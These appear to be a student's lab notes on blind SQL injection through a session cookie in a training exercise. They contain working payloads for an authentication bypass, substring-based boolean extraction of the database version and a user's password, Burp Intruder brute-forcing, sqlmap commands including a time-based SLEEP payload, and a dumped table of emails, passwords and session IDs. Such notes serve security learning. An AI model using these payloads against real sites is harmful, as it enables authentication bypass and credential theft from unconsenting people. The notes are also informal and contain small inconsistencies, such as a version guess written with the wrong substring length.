Search

Blind Injection

Run website through burp intercept and repeater

Automate finding the injection:

  1. Copy the code for sending credentials and make a txt file
  2. use sqlmap:
      3. sqlmap -r request.txt
    1. On a live target, you wanna say Y to the question
  3. Result: not injectible. It is more worth to look at other functionalities of the

We know that it gives us a cookie: session=cookieHere

and then uses that in our session.

  • We want to know what it takes from us and uses so we can test against changing whatever it is and testing. For example, if it suggests a plugin for our browser, that means it takes User-Agent into account and we can play around with it to break the website

Example:

Valid session ID:

Cookie: session=6967cabefd763ac1a1a88e11159957dba

trying an invalid session ID with sql injections:

Cookie: session=6967cabefd763ac1a1a88e11159957dba' or 1=1#

also authenticates us!

How do we inject with this?

6967cabefd763ac1a1a88e11159957dba' or substring('a', 1, 1) = 'a'#

substring: string, starting from, ends at (length of)

so:

6967cabefd763ac1a1a88e11159957dba' or substring('alex', 1, 3) = 'ale'#

is also true

Use it in the database:

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 1) = '7'#

This statement tests if it’s version 7 of SQL. select statement in brackets because we need it to resolve first.

We get a fail (we know it’s 8).

Enum the version:

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 3) = '8.0'#

correct

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 3) = '8.0.1'#

wrong

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 5) = '8.0.2'#

wrong

6967cabefd763ac1a1a88e11159957dba' or substring((select version()), 1, 5) = '8.0.3'#

right!

DB version is 8.0.3

How do we extract his password?

6967cabefd763ac1a1a88e11159957dba' or substring((select password from injection0x02 where username = 'jessamy'), 1, 1) = '§z§'#

Send it to intruder and let it do it for us

OR

SQLMAP

sudo sqlmap -r request2.txt --level=2 #-T injection0x02 --threads 10

—level=2 for cookies

image
Payload: session=6967cabefd763ac1a1a88e11159957dba' AND (SELECT 1517 FROM (SELECT(SLEEP(5)))fMVm) AND 'Qdaw'='Qdaw

levels question: yes

integers he said no first time and yes second time????????

is vulnerable, keep testing for other?: no

image
+---------------------+--------------+----------+----------------------------------+
| email               | password     | username | session                          |
+---------------------+--------------+----------+----------------------------------+
| jeremy@example.com  | jeremy       | jeremy   | 6967cabefd763ac1a1a88e11159957db |
| jessamy@example.com | ZWFzdGVyZWdn | jessamy  | 9dedc6891e2839a791ed37157f1241fe |
+---------------------+--------------+----------+----------------------------------+